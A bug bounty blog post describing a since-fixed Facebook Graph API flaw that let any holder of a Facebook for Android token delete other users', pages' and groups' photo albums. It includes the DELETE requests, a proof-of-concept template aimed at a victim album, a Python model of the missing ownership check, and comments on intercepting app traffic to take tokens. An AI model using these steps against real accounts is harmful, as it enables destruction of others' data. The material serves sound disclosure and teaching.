How I Hacked Your Facebook Photos - Deleting any photo albums

What if your photos get deleted without your knowledge?

Obviously that's very disturbing, isn't it? Yup, this post is about a vulnerability I found which allowed a malicious user to delete any photo album on Facebook. Any photo album owned by a user, a page or a group could be deleted.


The Graph API is the primary way for developers to read and write user data. All current Facebook apps use the Graph API. In general the Graph API requires an access token to read or write user data. You can read more about the Graph API in Facebook's developer documentation.

According to the Facebook developer documentation, photo albums cannot be deleted using the album node in the Graph API.

[Screenshot: Facebook Photo Delete Hack Graph API]

I tried to delete one of my photo albums using a Graph Explorer access token.

Request :-
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbajNEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVlaDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm3we0X3lp6ZB0hlaSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKsGJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD

Response :-
{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}

Why? Because this application doesn't have the capability to delete photo albums. But note the error message: it tells us that some other application does have the capability to make this API call :P

I decided to try it with a Facebook for mobile access token because it is a top-level access token which has some extra permissions. Facebook's mobile apps use the same Graph API, so I took one of my album ids and my own Facebook for Android access token and tried it.

Request :-
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

Response :-
true

Album 518171421550249 got deleted :D So what's the next step? I took the victim's album id and tried to delete it. I was very curious to see the result.

Request :-
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

Response :-
true

OMG :D the album got deleted! So what? I got access to delete all of your Facebook photos (photos which are public or the photos I could see) :P lol :D
I immediately reported this bug to the Facebook security team. They were very fast in identifying the issue and a fix was in place in less than 2 hours from the acknowledgement of the report.
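To make the missing check concrete, here is an added example (my own illustration, not Facebook's code) that models the authorization decision behind DELETE /{album-id}. The vulnerable version mirrors what the responses above suggest: it only asks whether the calling app has the delete capability. The hardened version also asks whether the token's user owns the album, or administers the page or group that owns it, and returns one generic denial for both missing and foreign albums. All app names, user ids, album records and error texts other than the (#200) message are constructed.

```python
# Added example (not Facebook's code): a model of the authorization decision
# behind "DELETE /{album-id}". Tokens, app names, ids and album records are
# constructed sample data; only the (#200) capability message is quoted from
# the real response shown in the post.
from dataclasses import dataclass

CAPABILITY_ERROR = {"error": {
    "message": "(#200) Application does not have the capability to make this API call.",
    "type": "OAuthException", "code": 200}}
# One generic denial for "no such album" and "not your album", so the endpoint
# does not act as an oracle for whether an album id exists (constructed message).
DENIED = {"error": {
    "message": "Album not found or cannot be deleted by this user.",
    "type": "OAuthException", "code": 403}}

@dataclass(frozen=True)
class Token:
    user_id: str   # the user the token was issued for
    app: str       # the app the token was issued to

@dataclass(frozen=True)
class Album:
    owner_type: str   # "user", "page" or "group"
    owner_id: str

# Constructed fixtures: which apps may call delete, who owns which album,
# and who administers which page or group.
APPS_WITH_DELETE_CAPABILITY = {"facebook_for_android"}
ALBUMS = {
    "518171421550249": Album("user", "alice"),
    "900000000000001": Album("user", "bob"),
    "900000000000002": Album("page", "acme_page"),
    "900000000000003": Album("group", "hiking_group"),
}
ADMINS = {"acme_page": {"carol"}, "hiking_group": {"dave"}}

def authorize_delete_vulnerable(token: Token, album_id: str):
    """The flawed decision: only the app capability is checked, so any user
    holding a capable app's token may delete any existing album."""
    if token.app not in APPS_WITH_DELETE_CAPABILITY:
        return CAPABILITY_ERROR
    return True if album_id in ALBUMS else DENIED

def authorize_delete_hardened(token: Token, album_id: str):
    """Capability check plus object-level authorization against the owner."""
    if token.app not in APPS_WITH_DELETE_CAPABILITY:
        return CAPABILITY_ERROR
    album = ALBUMS.get(album_id)
    if album is None:
        return DENIED
    if album.owner_type == "user":
        allowed = album.owner_id == token.user_id
    else:  # page or group album: only an admin of that owner may delete it
        allowed = token.user_id in ADMINS.get(album.owner_id, set())
    return True if allowed else DENIED
```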

Read more about getting a Facebook for Android access token in [Capture Android HTTP/HTTPS Traffic].

Final Proof Of Concept :-

Request :-
DELETE /<Victim's_photo_album_id> HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

If you aren't sure about how to do it, please see this video: [How I Hacked Your Public Facebook Photos]

First acknowledgement from Facebook security team


[Screenshot: Facebook Security Team acknowledgement of the delete photo albums bug]

Acknowledgement of the fix; Facebook rewarded me $12500 USD for reporting this vulnerability.

[Screenshot: Facebook Photo Delete Hack reward, $12500 USD]


Now it's completely fixed.

[Screenshot: error message of the delete photos hack]



I thank the Facebook Security Team for running the bug bounty program and also for quickly fixing this issue :)

You can also read about my latest finding: hacking Facebook account private photos.

HALL OF FAME: https://www.facebook.com/whitehat/thanks
Topping the list :D

[Screenshot: Laxman Muthiyah in the Facebook Whitehat Hacker updated list 2015]



110 comments:

  1. Nice, Congo man.
    So it was your blog ah?

  2. How do you get Facebook for Android access token?

    Replies
    1. You can get it by intercepting Facebook mobile application requests.

    2. Can anyone tell how to intercept mobile app requests? Or some good tutorial post on it will be helpful...

    3. I think a simple MITM with Wireshark would do. Search for both and you'll find plenty of tutorials.

  3. Congratulations, you should have been hired by facebook

  4. Great job bro, keep up the good work :)

  5. Scary bug but good that it got fixed

  6. Can you tell me the name of the chrome plugin please? I like the background on google

    Replies
    1. https://chrome.google.com/webstore/category/themes?hl=en

  7. Isn't there a zero missing from the bounty amount, for such a potentially disastrous bug?

  8. Can you please name the Chrome plugin for web developers?

    Replies
    1. Are you referring to the Firefox plugin? At 2:57? It's a Firefox plugin called HackBar.

  9. You're really good, doing great work.

  11. Hi

    I am working on one project named http://www.seestatus.com; this is also a social network website. Can we work together? We need a person like you. My number: 07044283747

  12. Replies
    1. Thank you Rafay Baloch :) Glad to hear from you :)

  14. Great work bro, congrats! Thanks, you will be a great inspiration to upcoming students to find bugs and become whitehats.

  15. Do you know how I could verify my Facebook page?

  16. Very awesome! Do you have any other tutorials or tips on how to hack? I'm new to this topic but very curious, seems fun.

    Replies
    1. Hopefully I'll be posting soon. Stay tuned :)

  17. I was surprised my cover photo was mysteriously gone--from my personal profile and page. I suspected it was an error...Thanks for updating the Facebook team. #Peace

  18. How did you send this bug to Facebook???
    There is an option called report problem if we send any message. They are not responding ...

    Replies
    1. If you find a security vulnerability report it here https://www.facebook.com/whitehat/report

      For more details
      https://www.facebook.com/whitehat/

  20. Great Discovery Bro, You inspire so many of us who want to do the same. Keep it up, Hope to Connect with you soon.

  21. Which software did you use to intercept Facebook mobile's traffic? Fiddler or Wireshark maybe?

  22. Hi! I'm an Uruguayan journalist and I'd like to ask you some questions. Can you tell me your e-mail? Thank you very much.

  24. Awesome job bro...

    I'm very happy hearing that there are some good whitehats in India also..
    Congrats..

    Can you suggest me some great free online learning place for web development???

    Replies
    1. https://www.tutorialspoint.com this is one cool place to start. Make use of websites like stackoverflow if you have some knowledge in web dev.

  25. But my albums are getting deleted as soon as I post them! Please help.

    Replies
    1. Please give me brief details.
      -laxmanmuthiyah@gmail.com

  26. Excellent work, I would not want to quarrel with you;) Have you received an award from Facebook?

  28. Wow, so simple but so nice! It's incredible... I mean, of course you're really smart and this was a great hack, but everybody could do this in a few hours without huge knowledge! That's so surprising!
    You also were able to delete posts and publish, right?

  31. I hack but can not delete :(

  32. Laxman, which subject did you study in college?

  33. How do you get an access token which never expires? Mine expires in one hour.

  36. Hello, I have this error: HOST: .................... PORT: ...................

  39. Hello.. I am in a big problem and I hope I will get a solution from this site.. Actually my friend's Facebook profile has been hacked.. Somebody has created a public page with her name which contains all her pictures and posts.. Every time she posts or puts pictures on her Facebook page that public page also does the same.. That page is not genuine and contains very bad comments in it.. And the big problem is it contains my picture too.. I want to know how to delete my picture from that page because I don't want it to remain there.. Also how can we delete that page?? Please help me.....

  40. Virtually, you can use this method to delete any photo album that belongs to a user who has registered to your Facebook app, not any Facebook user.

  41. Nice find. Keep inspiring people. :) I have one silly question, hope I will get the answer. I cannot understand how it is showing "facebook for android" with app id in the APP ID section on your access token page.
    I actually created one Facebook page long back and it is showing that page's app id in the access token page.

  42. My photos have been deleted like this... Please help me to get them back please

  44. Hi,

    I am new to bug bounty, can you tell me how you intercepted using Burp Suite? Facebook does not allow me to use Burp Suite, it gives an invalid certificate.

    Replies
    1. Please install Burp's CA certificate
      https://portswigger.net/burp/help/proxy_options_installingCAcert.html
